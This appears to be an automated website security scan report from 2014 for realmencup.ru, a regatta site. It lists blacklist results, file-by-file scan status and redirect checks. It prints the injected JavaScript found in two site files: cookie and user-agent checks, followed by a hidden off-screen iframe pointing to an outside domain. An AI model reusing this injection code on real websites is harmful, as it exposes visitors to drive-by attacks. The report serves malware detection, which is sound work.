Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=realmencup.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://realmencup.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
|---|---|---|
| http://realmencup.ru/ | 200 OK, Content-Length: 23214, Content-Type: text/html | clean |
| http://realmencup.ru/media/system/js/caption.js | 200 OK, Content-Length: 2975, Content-Type: application/x-javascript | malicious |
| http://realmencup.ru/media/widgetkit/js/jquery.js | 200 OK, Content-Length: 95206, Content-Type: application/x-javascript | clean |
| http://realmencup.ru/cache/widgetkit/widgetkit-364b5e23.js | 200 OK, Content-Length: 22177, Content-Type: application/x-javascript | clean |
| http://realmencup.ru/modules/mod_news_show_gk3/scripts/engine_1_11_compressed.js | 200 OK, Content-Length: 2572, Content-Type: application/x-javascript | clean |
| http://realmencup.ru/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js | 200 OK, Content-Length: 969, Content-Type: application/x-javascript | malicious |
| http://realmencup.ru/modules/mod_ariextmenu/mod_ariextmenu/js/menu.min.js | 200 OK, Content-Length: 8226, Content-Type: application/x-javascript | clean |
| http://realmencup.ru/o-proekte/ | 200 OK, Content-Length: 14232, Content-Type: text/html | clean |
| http://realmencup.ru/organizatory/ | 200 OK, Content-Length: 13293, Content-Type: text/html | clean |
| http://realmencup.ru/informacionnye-partnery/ | 200 OK, Content-Length: 15157, Content-Type: text/html | clean |
| http://realmencup.ru/komandy/ | 200 OK, Content-Length: 14924, Content-Type: text/html | clean |
| http://realmencup.ru/celi-i-zadachi/ | 200 OK, Content-Length: 14077, Content-Type: text/html | clean |
| http://realmencup.ru/yahty/ | 200 OK, Content-Length: 13560, Content-Type: text/html | clean |
| http://realmencup.ru/programma-regaty/ | 200 OK, Content-Length: 19457, Content-Type: text/html | clean |
| http://realmencup.ru/pr-vozmozhnosti/ | 200 OK, Content-Length: 27783, Content-Type: text/html | clean |

Malicious code in http://realmencup.ru/media/system/js/caption.js - confirmed by antiviruses (see below). The scanner's excerpt is truncated: the injected getCookie/Visitrepositorium code is prepended to the site's legitimate JCaption code, and the excerpt cuts the injected function short, so the two fragments run together.

```javascript
// Injected code: reads a cookie by name (used below to check the "lastshow" marker)
function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}
// Injected code: user-agent and cookie checks (excerpt cut short by the scanner here)
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  var bb = (getCookie("lastshow") === undefined);
  // From here on the excerpt continues with the site's original JCaption code
  if ( element.title != "" ) { container.appendChild(text); }
  container.className = this.selector.replace('.', '_');
  container.className = container.className + " " + align;
  container.setAttribute("style","float:"+align);
  container.style.width = width + "px";
  } });
document.caption = null;
window.addEvent('load', function() {
  var caption = new JCaption('img.caption')
  document.caption = caption
});
```

Antivirus reports:

Malicious code in http://realmencup.ru/modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js - confirmed by antiviruses (see below). This is the complete injected payload as the scanner reported it:

```javascript
// Reads a cookie by name; used to decide whether the payload already fired
function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  // Skips Chrome, IE Mobile and any non-Windows browser (note "< +1" means indexOf returned -1 or 0)
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  // Fires only once per browser: the "lastshow" cookie marks a previous visit
  var bb = (getCookie("lastshow") === undefined);
  if (!ulrcont && bb) {
    // Writes an off-screen 140x140 iframe pointing at the third-party domain
    document.write('<iframe src="http://glasoretas.yongki.us/matrosikasuhan15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>');
    // Sets the marker cookie for 64 hours so the iframe is not re-injected on later visits
    var date = new Date( new Date().getTime() + 64*60*60*1000 );
    document.cookie="lastshow=1; path=/; expires="+date.toUTCString();
  }
}
Visitrepositorium();
```

Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: realmencup.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 26 Aug 2014 10:06:20 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 26 Aug 2014 10:06:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2eef647737eaf4ce2ae24a8b9ce0162a=ib60j84ap2k4p58bltedf3biq5; path=/
Status: 200 OK
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: realmencup.ru
Referer: http://www.google.com/search?q=realmencup.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.